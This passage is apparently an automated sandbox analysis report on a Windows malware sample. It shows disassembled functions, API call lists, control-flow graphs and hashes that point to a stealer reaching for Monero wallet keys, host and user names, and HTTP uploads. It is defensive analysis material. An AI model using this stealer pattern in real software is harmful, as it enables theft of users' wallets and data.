                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 1d1248ed6719da1d6ec1873133f570a6f82f771cce3017a12b4efc30628f7ae4
                        • Instruction ID: a89aa886ca4c93e0ef0cfd555fb17bd5b8ef9f21b3191833d7c776eb9fff4404
                        • Opcode Fuzzy Hash: 1d1248ed6719da1d6ec1873133f570a6f82f771cce3017a12b4efc30628f7ae4
                        • Instruction Fuzzy Hash: 594105606C660CFAF63ABFE48DC2E9D77567F46B08F707864BA0052283DBB165029536
                        Function 00C44880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 c44880-c44942 call c5a7a0 call c447b0 call c5a740 * 5 InternetOpenA StrCmpCA 816 c44944 801->816 817 c4494b-c4494f 801->817 816->817 818 c44955-c44acd call c58b60 call c5a920 call c5a8a0 call c5a800 * 2 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a920 call c5a8a0 call c5a800 * 2 InternetConnectA 817->818 819 c44ecb-c44ef3 InternetCloseHandle call c5aad0 call c49ac0 817->819 818->819 905 c44ad3-c44ad7 818->905 829 c44ef5-c44f2d call c5a820 call c5a9b0 call c5a8a0 call c5a800 819->829 830 c44f32-c44fa2 call c58990 * 2 call c5a7a0 call c5a800 * 8 819->830 829->830 906 c44ae5 905->906 907 c44ad9-c44ae3 905->907 908 c44aef-c44b22 HttpOpenRequestA 906->908 907->908 909 c44ebe-c44ec5 InternetCloseHandle 908->909 910 c44b28-c44e28 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a740 call c5a920 * 2 call c5a8a0 call c5a800 * 2 call c5aad0 lstrlen call c5aad0 * 2 lstrlen call c5aad0 HttpSendRequestA 908->910 909->819 1021 c44e32-c44e5c InternetReadFile 910->1021 1022 c44e67-c44eb9 InternetCloseHandle call c5a800 1021->1022 1023 c44e5e-c44e65 1021->1023 1022->909 1023->1022 1024 c44e69-c44ea7 call c5a9b0 call c5a8a0 call c5a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C44915
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C4493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C44ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C60DDB,00000000,?,?,00000000,?,",00000000,?,008A0700), ref: 00C44DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C44E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C44E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C44E49
                        • InternetCloseHandle.WININET(00000000), ref: 00C44EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00C44EC5
                        • HttpOpenRequestA.WININET(00000000,008A0720,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C44B15
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • InternetCloseHandle.WININET(00000000), ref: 00C44ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: ebb020829a7a238b6a3be5a1416f2dd302a9225ea899454b38805a3e7aea5444
                        • Instruction ID: 1b93f76e8d785f57da1d7c2660f98387e6a8bd7475ed69750d080f1cb76701f7
                        • Opcode Fuzzy Hash: ebb020829a7a238b6a3be5a1416f2dd302a9225ea899454b38805a3e7aea5444
                        • Instruction Fuzzy Hash: BD120D75910218AADB14EB92DC92FEEB378BF14301F5442A9B50672091EF702F8DDF66
                        Function 00C578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00C5792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 3a9a3691aa14792f2d08bcb85730b8ebf66131c2edc5ea15ad71b0f21e25f6a9
                        • Instruction ID: 05b5f576540970129573c5c2b319bc1f50c4846f826d7c322523fa658e565595
                        • Opcode Fuzzy Hash: 3a9a3691aa14792f2d08bcb85730b8ebf66131c2edc5ea15ad71b0f21e25f6a9
                        • Instruction Fuzzy Hash: 540162B1904204EFD714DF95DD49FAAFBB8F704B11F10426AEA45A2280C37459488BA1
                        Function 00C57850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C411B7), ref: 00C57880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C5789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: fee6109b4ba100f49e83a620240ac4e44069acb080cfe6089a8345718a34c645
                        • Instruction ID: b09492da5485d8ce4d4dd3ce5aaf2819d248688f09be1fa6908e79b6f7d01a20
                        • Opcode Fuzzy Hash: fee6109b4ba100f49e83a620240ac4e44069acb080cfe6089a8345718a34c645
                        • Instruction Fuzzy Hash: 6FF04FB1944208AFD714DF99DD49FAEBBB8EB04711F10026AFA05A2680C77515488BA1
                        Function 00C41160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 60c7e5051518038c715cea137919cae061c90c7bf0ce08d1210671b0a4be7be3
                        • Instruction ID: 81f4bf12f92dc4076b0432233aed9b0d2910cfbf9a48db530934693c134715ea
                        • Opcode Fuzzy Hash: 60c7e5051518038c715cea137919cae061c90c7bf0ce08d1210671b0a4be7be3
                        • Instruction Fuzzy Hash: 99D05E7490030CDFDB00DFE1D8496EDBB78FB08311F040566DD0972340EA315486CBA6
                        Function 00C59C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 c59c10-c59c1a 634 c5a036-c5a0ca LoadLibraryA * 8 633->634 635 c59c20-c5a031 GetProcAddress * 43 633->635 636 c5a146-c5a14d 634->636 637 c5a0cc-c5a141 GetProcAddress * 5 634->637 635->634 638 c5a216-c5a21d 636->638 639 c5a153-c5a211 GetProcAddress * 8 636->639 637->636 640 c5a21f-c5a293 GetProcAddress * 5 638->640 641 c5a298-c5a29f 638->641 639->638 640->641 642 c5a2a5-c5a332 GetProcAddress * 6 641->642 643 c5a337-c5a33e 641->643 642->643 644 c5a344-c5a41a GetProcAddress * 9 643->644 645 c5a41f-c5a426 643->645 644->645 646 c5a4a2-c5a4a9 645->646 647 c5a428-c5a49d GetProcAddress * 5 645->647 648 c5a4dc-c5a4e3 646->648 649 c5a4ab-c5a4d7 GetProcAddress * 2 646->649 647->646 650 c5a515-c5a51c 648->650 651 c5a4e5-c5a510 GetProcAddress * 2 648->651 649->648 652 c5a612-c5a619 650->652 653 c5a522-c5a60d GetProcAddress * 10 650->653 651->650 654 c5a67d-c5a684 652->654 655 c5a61b-c5a678 GetProcAddress * 4 652->655 653->652 656 c5a686-c5a699 GetProcAddress 654->656 657 c5a69e-c5a6a5 654->657 655->654 656->657 658 c5a6a7-c5a703 GetProcAddress * 4 657->658 659 c5a708-c5a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,008877D0), ref: 00C59C2D
                        • GetProcAddress.KERNEL32(74DD0000,00887690), ref: 00C59C45
                        • GetProcAddress.KERNEL32(74DD0000,0089B820), ref: 00C59C5E
                        • GetProcAddress.KERNEL32(74DD0000,0089B7C0), ref: 00C59C76
                        • GetProcAddress.KERNEL32(74DD0000,0089B7D8), ref: 00C59C8E
                        • GetProcAddress.KERNEL32(74DD0000,0089B7F0), ref: 00C59CA7
                        • GetProcAddress.KERNEL32(74DD0000,0088D7E8), ref: 00C59CBF
                        • GetProcAddress.KERNEL32(74DD0000,0089EDE0), ref: 00C59CD7
                        • GetProcAddress.KERNEL32(74DD0000,0089ECC0), ref: 00C59CF0
                        • GetProcAddress.KERNEL32(74DD0000,0089ED50), ref: 00C59D08
                        • GetProcAddress.KERNEL32(74DD0000,0089EE10), ref: 00C59D20
                        • GetProcAddress.KERNEL32(74DD0000,00887790), ref: 00C59D39
                        • GetProcAddress.KERNEL32(74DD0000,00887630), ref: 00C59D51
                        • GetProcAddress.KERNEL32(74DD0000,008877B0), ref: 00C59D69
                        • GetProcAddress.KERNEL32(74DD0000,00887810), ref: 00C59D82
                        • GetProcAddress.KERNEL32(74DD0000,0089EC48), ref: 00C59D9A
                        • GetProcAddress.KERNEL32(74DD0000,0089ED68), ref: 00C59DB2
                        • GetProcAddress.KERNEL32(74DD0000,0088D450), ref: 00C59DCB
                        • GetProcAddress.KERNEL32(74DD0000,00887830), ref: 00C59DE3
                        • GetProcAddress.KERNEL32(74DD0000,0089EC60), ref: 00C59DFB
                        • GetProcAddress.KERNEL32(74DD0000,0089ED08), ref: 00C59E14
                        • GetProcAddress.KERNEL32(74DD0000,0089ED80), ref: 00C59E2C
                        • GetProcAddress.KERNEL32(74DD0000,0089EC78), ref: 00C59E44
                        • GetProcAddress.KERNEL32(74DD0000,00887470), ref: 00C59E5D
                        • GetProcAddress.KERNEL32(74DD0000,0089EC30), ref: 00C59E75
                        • GetProcAddress.KERNEL32(74DD0000,0089EDC8), ref: 00C59E8D
                        • GetProcAddress.KERNEL32(74DD0000,0089ECF0), ref: 00C59EA6
                        • GetProcAddress.KERNEL32(74DD0000,0089ED38), ref: 00C59EBE
                        • GetProcAddress.KERNEL32(74DD0000,0089EEA0), ref: 00C59ED6
                        • GetProcAddress.KERNEL32(74DD0000,0089EC90), ref: 00C59EEF
                        • GetProcAddress.KERNEL32(74DD0000,0089EED0), ref: 00C59F07
                        • GetProcAddress.KERNEL32(74DD0000,0089ED98), ref: 00C59F1F
                        • GetProcAddress.KERNEL32(74DD0000,0089EEB8), ref: 00C59F38
                        • GetProcAddress.KERNEL32(74DD0000,0089C318), ref: 00C59F50
                        • GetProcAddress.KERNEL32(74DD0000,0089EC00), ref: 00C59F68
                        • GetProcAddress.KERNEL32(74DD0000,0089EDB0), ref: 00C59F81
                        • GetProcAddress.KERNEL32(74DD0000,00887850), ref: 00C59F99
                        • GetProcAddress.KERNEL32(74DD0000,0089EDF8), ref: 00C59FB1
                        • GetProcAddress.KERNEL32(74DD0000,00887490), ref: 00C59FCA
                        • GetProcAddress.KERNEL32(74DD0000,0089EE28), ref: 00C59FE2
                        • GetProcAddress.KERNEL32(74DD0000,0089EE40), ref: 00C59FFA
                        • GetProcAddress.KERNEL32(74DD0000,008874B0), ref: 00C5A013
                        • GetProcAddress.KERNEL32(74DD0000,00887890), ref: 00C5A02B
                        • LoadLibraryA.KERNEL32(0089ED20,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A03D
                        • LoadLibraryA.KERNEL32(0089EEE8,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A04E
                        • LoadLibraryA.KERNEL32(0089ECA8,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A060
                        • LoadLibraryA.KERNEL32(0089EE58,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A072
                        • LoadLibraryA.KERNEL32(0089EE70,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A083
                        • LoadLibraryA.KERNEL32(0089EE88,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A095
                        • LoadLibraryA.KERNEL32(0089EC18,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A0A7
                        • LoadLibraryA.KERNEL32(0089ECD8,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A0B8
                        • GetProcAddress.KERNEL32(75290000,00887A30), ref: 00C5A0DA
                        • GetProcAddress.KERNEL32(75290000,0089F110), ref: 00C5A0F2
                        • GetProcAddress.KERNEL32(75290000,0089ADC8), ref: 00C5A10A
                        • GetProcAddress.KERNEL32(75290000,0089F0E0), ref: 00C5A123
                        • GetProcAddress.KERNEL32(75290000,00887AF0), ref: 00C5A13B
                        • GetProcAddress.KERNEL32(6FDD0000,0088D4C8), ref: 00C5A160
                        • GetProcAddress.KERNEL32(6FDD0000,008878D0), ref: 00C5A179
                        • GetProcAddress.KERNEL32(6FDD0000,0088D770), ref: 00C5A191
                        • GetProcAddress.KERNEL32(6FDD0000,0089F068), ref: 00C5A1A9
                        • GetProcAddress.KERNEL32(6FDD0000,0089F0F8), ref: 00C5A1C2
                        • GetProcAddress.KERNEL32(6FDD0000,00887BF0), ref: 00C5A1DA
                        • GetProcAddress.KERNEL32(6FDD0000,00887930), ref: 00C5A1F2
                        • GetProcAddress.KERNEL32(6FDD0000,0089F008), ref: 00C5A20B
                        • GetProcAddress.KERNEL32(752C0000,00887AD0), ref: 00C5A22C
                        • GetProcAddress.KERNEL32(752C0000,00887A90), ref: 00C5A244
                        • GetProcAddress.KERNEL32(752C0000,0089F1D0), ref: 00C5A25D
                        • GetProcAddress.KERNEL32(752C0000,0089F128), ref: 00C5A275
                        • GetProcAddress.KERNEL32(752C0000,00887BB0), ref: 00C5A28D
                        • GetProcAddress.KERNEL32(74EC0000,0088D3B0), ref: 00C5A2B3
                        • GetProcAddress.KERNEL32(74EC0000,0088D860), ref: 00C5A2CB
                        • GetProcAddress.KERNEL32(74EC0000,0089EF78), ref: 00C5A2E3
                        • GetProcAddress.KERNEL32(74EC0000,00887970), ref: 00C5A2FC
                        • GetProcAddress.KERNEL32(74EC0000,00887950), ref: 00C5A314
                        • GetProcAddress.KERNEL32(74EC0000,0088D518), ref: 00C5A32C
                        • GetProcAddress.KERNEL32(75BD0000,0089F140), ref: 00C5A352
                        • GetProcAddress.KERNEL32(75BD0000,00887A50), ref: 00C5A36A
                        • GetProcAddress.KERNEL32(75BD0000,0089AE28), ref: 00C5A382
                        • GetProcAddress.KERNEL32(75BD0000,0089F158), ref: 00C5A39B
                        • GetProcAddress.KERNEL32(75BD0000,0089F098), ref: 00C5A3B3
                        • GetProcAddress.KERNEL32(75BD0000,00887B10), ref: 00C5A3CB
                        • GetProcAddress.KERNEL32(75BD0000,00887B30), ref: 00C5A3E4
                        • GetProcAddress.KERNEL32(75BD0000,0089F020), ref: 00C5A3FC
                        • GetProcAddress.KERNEL32(75BD0000,0089EF90), ref: 00C5A414
                        • GetProcAddress.KERNEL32(75A70000,008878F0), ref: 00C5A436
                        • GetProcAddress.KERNEL32(75A70000,0089EF00), ref: 00C5A44E
                        • GetProcAddress.KERNEL32(75A70000,0089F038), ref: 00C5A466
                        • GetProcAddress.KERNEL32(75A70000,0089EF18), ref: 00C5A47F
                        • GetProcAddress.KERNEL32(75A70000,0089EFD8), ref: 00C5A497
                        • GetProcAddress.KERNEL32(75450000,008878B0), ref: 00C5A4B8
                        • GetProcAddress.KERNEL32(75450000,00887BD0), ref: 00C5A4D1
                        • GetProcAddress.KERNEL32(75DA0000,00887C10), ref: 00C5A4F2
                        • GetProcAddress.KERNEL32(75DA0000,0089EF30), ref: 00C5A50A
                        • GetProcAddress.KERNEL32(6F070000,00887A70), ref: 00C5A530
                        • GetProcAddress.KERNEL32(6F070000,00887910), ref: 00C5A548
                        • GetProcAddress.KERNEL32(6F070000,00887990), ref: 00C5A560
                        • GetProcAddress.KERNEL32(6F070000,0089EF48), ref: 00C5A579
                        • GetProcAddress.KERNEL32(6F070000,008879B0), ref: 00C5A591
                        • GetProcAddress.KERNEL32(6F070000,00887870), ref: 00C5A5A9
                        • GetProcAddress.KERNEL32(6F070000,008879D0), ref: 00C5A5C2
                        • GetProcAddress.KERNEL32(6F070000,00887B50), ref: 00C5A5DA
